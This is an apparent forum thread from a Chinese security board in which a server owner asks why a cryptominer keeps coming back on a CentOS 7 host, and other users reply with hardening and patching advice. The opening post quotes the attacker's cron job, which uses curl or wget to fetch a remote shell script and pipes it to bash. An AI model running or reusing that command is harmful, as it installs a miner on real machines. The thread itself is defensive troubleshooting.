吾爱破解 - LCG - LSG |安卓破解|病毒分析|www.52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 3103|回复: 14
收起左侧

[已解决] 求助!!!contOS7 中挖矿病毒,重装系统后第二天还是出现同样的问题

[复制链接]
Archer丶松 发表于 2021-3-22 12:50
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!
本帖最后由 Archer丶松 于 2021-4-7 09:51 编辑

被攻破root用户, 以root用户创建了定时任务。拉取的攻击脚本的cron定时任务:30 23 * * * root (curl -s http://w.apacheorg.top:1234/xmss||wget -q -O - http://w.apacheorg.top:1234/xmss )|bash -sh
上述链接中我下载下来看过,为一个shell脚本

必须申明的是: 服务器就这孤零零的一台, 不存在平行传播的可能性。

网上有朋友提及redis, 但是我的redis是以docker 运行, 端口并没有暴露出去, 阿里云上, 也没有开放redis的端口。
也有人说是通过nginx攻击

经过一次格盘重装, 但是工作日一早起来就发现再次中毒。


并且: ssh 禁用root登录, 更换了默认端口。 服务器使用宝塔面板管理系统应用和数据库等资源。经过查看服务器里面的服务, 应用和必要程序都没有删除。
没有信息丢失。




统一回复:经过重装等操作并没有实际解决后,购买了阿里的防火墙,同一IP访问频率过快或进行敏感操作的话就会被防火墙禁用IP(最终解决方式花钱

最新更新,于阿里云中发现

最新更新,于阿里云中发现
6077b86966532f7c499fe03e21c1736.png
95875f34b04503a00a667e92c7cbee8.png

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

Andrea 发表于 2021-3-22 13:57
不用面板手动搭建一个试试,原因自己猜~
然后,我们根据已知情况来排查,日志有没有被干掉,没有的话,去看下啥时候上来的。然后去分析一下业务访问的IP,有没有比较奇怪的。然后排查自己使用的各种中间件和组件有没有加固~最后禁用root远程登录,管理员账户密码设置强一点,把ssh防爆破用起来denyhost和fail2ban选一个,都很好使
流年 发表于 2021-3-22 13:42
这个我们公司也中过,反反复复,怎么重装,重新部署,怎么限制,它都会回来。最后记录所有来自外接的扫描日志,才发现攻击者是通过weblogic的xml注入漏洞进来拿到webshell,然后再提权拿下服务器,种进来的病毒。
升级打上对应的weblogic补丁后,世界终于安静了,再也没进来过。
 楼主| Archer丶松 发表于 2021-3-22 13:05
K1n9 发表于 2021-3-22 13:12
密码被猜到了吧,把root密码换了他。
codinglife 发表于 2021-3-22 13:18
我之前遇到过,阿里云重装系统就可以了,做好备份
 楼主| Archer丶松 发表于 2021-3-22 13:41
K1n9 发表于 2021-3-22 13:12
密码被猜到了吧,把root密码换了他。

试过了,root密码更换过,第二天发现同样的问题。
 楼主| Archer丶松 发表于 2021-3-22 13:42
codinglife 发表于 2021-3-22 13:18
我之前遇到过,阿里云重装系统就可以了,做好备份

就是使用阿里云重装之后发现同样的问题,才过来求助的。不知道为啥
TughluqLTD 发表于 2021-3-22 14:18
学习学习
 楼主| Archer丶松 发表于 2021-3-22 14:26
流年 发表于 2021-3-22 13:42
这个我们公司也中过,反反复复,怎么重装,重新部署,怎么限制,它都会回来。最后记录所有来自外接的扫描日 ...

嗯嗯,好的好的,我去试试~
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则 警告:本版块禁止灌水或回复与主题无关内容,违者重罚!

快速回复 收藏帖子 返回列表 搜索

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-3-29 22:01

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表